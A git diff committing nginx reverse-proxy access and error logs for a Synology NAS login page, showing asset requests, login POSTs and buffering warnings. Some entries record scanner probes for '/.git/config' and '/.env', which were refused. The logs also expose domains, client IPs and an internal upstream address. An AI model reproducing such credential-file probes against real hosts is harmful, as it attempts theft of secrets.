"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.js?v=1650348555" [Client 54.224.93.144] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 54.224.93.144] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/3rdparty/VideoStation/style.css?v=1711016943" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ext-all.js?v=1650348555" [Client 54.224.93.144] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 54.224.93.144] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/constants.js?v=1650348555" [Client 54.224.93.144] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/index.js?v=1650348555" [Client 54.224.93.144] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 54.224.93.144] [Length 585390] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue/vue.min.js?v=1633587521" [Client 54.224.93.144] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vuex/vuex.min.js?v=1585722123" [Client 54.224.93.144] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 54.224.93.144] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/sodium.js?v=1650348555" [Client 54.224.93.144] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 54.224.93.144] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/vendor.js?v=1654081517" [Client 54.224.93.144] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.js?v=1678269761" [Client 54.224.93.144] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 54.224.93.144] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 54.224.93.144] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.wasm" [Client 54.224.93.144] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 54.224.93.144] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 54.224.93.144] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/2.style.css" [Client 54.224.93.144] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 54.224.93.144] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:27 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 54.224.93.144] [Length 11901] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:27 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 54.224.93.144] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/login/dist/style.css?v=1661421011" +[02/Feb/2026:21:00:27 +0000] - 200 200 - GET https profibot.synology.me "/webman/login_background.jpg?id=1" [Client 54.224.93.144] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:27 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 54.224.93.144] [Length 11226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:27 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 54.224.93.144] [Length 100237] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:30 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth" [Client 54.224.93.144] [Length 87] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:45 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth" [Client 54.224.93.144] [Length 87] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:47 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_16.png?v=40438" [Client 54.224.93.144] [Length 421] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "-" diff --git a/proxy-manager/data/logs/proxy-host-5_access.log.1.gz b/proxy-manager/data/logs/proxy-host-5_access.log.1.gz new file mode 100755 index 0000000..fb27f06 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_access.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-5_access.log.2.gz b/proxy-manager/data/logs/proxy-host-5_access.log.2.gz new file mode 100755 index 0000000..c02d52c Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_access.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-5_access.log.3.gz b/proxy-manager/data/logs/proxy-host-5_access.log.3.gz new file mode 100755 index 0000000..26fc84d Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_access.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-5_error.log b/proxy-manager/data/logs/proxy-host-5_error.log new file mode 100755 index 0000000..5b3a520 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-5_error.log @@ -0,0 +1,19 @@ +2026/01/13 11:07:55 [warn] 255#255: *17528 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/45/0000007456 while reading upstream, client: 84.1.26.27, server: profibot.synology.me, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/13 11:07:55 [warn] 254#254: *17527 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/45/0000007457 while reading upstream, client: 84.1.26.27, server: profibot.synology.me, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/13 11:07:55 [warn] 254#254: *17525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/45/0000007458 while reading upstream, client: 84.1.26.27, server: profibot.synology.me, request: "GET /scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/13 11:07:56 [warn] 254#254: *17520 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/45/0000007459 while reading upstream, client: 84.1.26.27, server: profibot.synology.me, request: "GET /webman/login_background.jpg?id=1 HTTP/1.1", upstream: "https://192.168.100.30:5001/webman/login_background.jpg?id=1", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/18 14:36:38 [warn] 401#401: *286675 using uninitialized "server" variable while logging request, client: 136.114.76.192, server: profibot.synology.me +2026/01/22 23:54:34 [warn] 318#318: *532 using uninitialized "server" variable while logging request, client: 208.84.101.154, server: profibot.synology.me +2026/01/23 11:51:06 [warn] 331#331: *7434 using uninitialized "server" variable while logging request, client: 208.84.101.154, server: profibot.synology.me +2026/01/25 01:55:58 [warn] 376#376: *74436 using uninitialized "server" variable while logging request, client: 208.84.101.154, server: profibot.synology.me +2026/01/25 20:40:30 [warn] 211#211: *3165 using uninitialized "server" variable while logging request, client: 208.84.101.154, server: profibot.synology.me +2026/01/28 01:29:08 [warn] 292#292: *17092 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/43/0000007434 while reading upstream, client: 91.98.176.86, server: profibot.synology.me, request: "GET /scripts/ext-3/ext-all.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/28 01:29:08 [warn] 292#292: *17091 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/43/0000007435 while reading upstream, client: 91.98.176.86, server: profibot.synology.me, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/28 01:29:08 [warn] 292#292: *17088 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/43/0000007436 while reading upstream, client: 91.98.176.86, server: profibot.synology.me, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/28 01:29:08 [warn] 292#292: *17094 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/43/0000007437 while reading upstream, client: 91.98.176.86, server: profibot.synology.me, request: "GET /synoSDSjslib/sds.js?v=1678269761 HTTP/1.1", upstream: "https://192.168.100.30:5001/synoSDSjslib/sds.js?v=1678269761", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/31 12:24:57 [warn] 254#254: *593 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000000014 while reading upstream, client: 49.12.172.234, server: profibot.synology.me, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/31 12:24:57 [warn] 253#253: *590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000000015 while reading upstream, client: 49.12.172.234, server: profibot.synology.me, request: "GET /scripts/ext-3/ext-all.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/01/31 12:24:57 [warn] 253#253: *591 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000000016 while reading upstream, client: 49.12.172.234, server: profibot.synology.me, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/02/02 21:00:26 [warn] 321#321: *28917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000011185 while reading upstream, client: 54.224.93.144, server: profibot.synology.me, request: "GET /scripts/ext-3/ext-all.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/02/02 21:00:26 [warn] 321#321: *28926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000011186 while reading upstream, client: 54.224.93.144, server: profibot.synology.me, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" +2026/02/02 21:00:26 [warn] 321#321: *28922 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000011187 while reading upstream, client: 54.224.93.144, server: profibot.synology.me, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "profibot.synology.me", referrer: "https://profibot.synology.me/" diff --git a/proxy-manager/data/logs/proxy-host-5_error.log.1.gz b/proxy-manager/data/logs/proxy-host-5_error.log.1.gz new file mode 100755 index 0000000..5079c25 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_error.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-5_error.log.2.gz b/proxy-manager/data/logs/proxy-host-5_error.log.2.gz new file mode 100755 index 0000000..99a1897 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_error.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-5_error.log.3.gz b/proxy-manager/data/logs/proxy-host-5_error.log.3.gz new file mode 100755 index 0000000..c4bd519 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-5_error.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_access.log b/proxy-manager/data/logs/proxy-host-6_access.log new file mode 100755 index 0000000..afb79d6 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-6_access.log @@ -0,0 +1,6670 @@ +[12/Jan/2026:08:09:44 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" "-" +[13/Jan/2026:04:34:14 +0000] - 403 403 - GET https nas.profibot.hu "/.env" [Client 204.76.203.25] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[13/Jan/2026:04:56:29 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 3.139.242.79] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[13/Jan/2026:05:15:25 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 3.18.186.238] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[13/Jan/2026:06:04:54 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 139.59.162.223] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[13/Jan/2026:06:04:54 +0000] - - 301 - GET http nas.profibot.hu "/favicon.ico" [Client 139.59.162.223] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "http://nas.profibot.hu/" +[13/Jan/2026:06:04:54 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 139.59.162.223] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[13/Jan/2026:06:04:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico" [Client 139.59.162.223] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "https://nas.profibot.hu/" +[13/Jan/2026:08:00:17 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 165.227.135.164] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:00:17 +0000] - - 301 - GET http nas.profibot.hu "/favicon.ico" [Client 165.227.135.164] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" "http://nas.profibot.hu/" +[13/Jan/2026:08:00:17 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 165.227.135.164] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:00:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico" [Client 165.227.135.164] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 84.1.26.27] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 84.1.26.27] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/css/desktop.css?v=1661421011" [Client 84.1.26.27] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.css?v=1654081517" [Client 84.1.26.27] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 84.1.26.27] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 84.1.26.27] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HotkeyManager/style.css?v=1661421011" 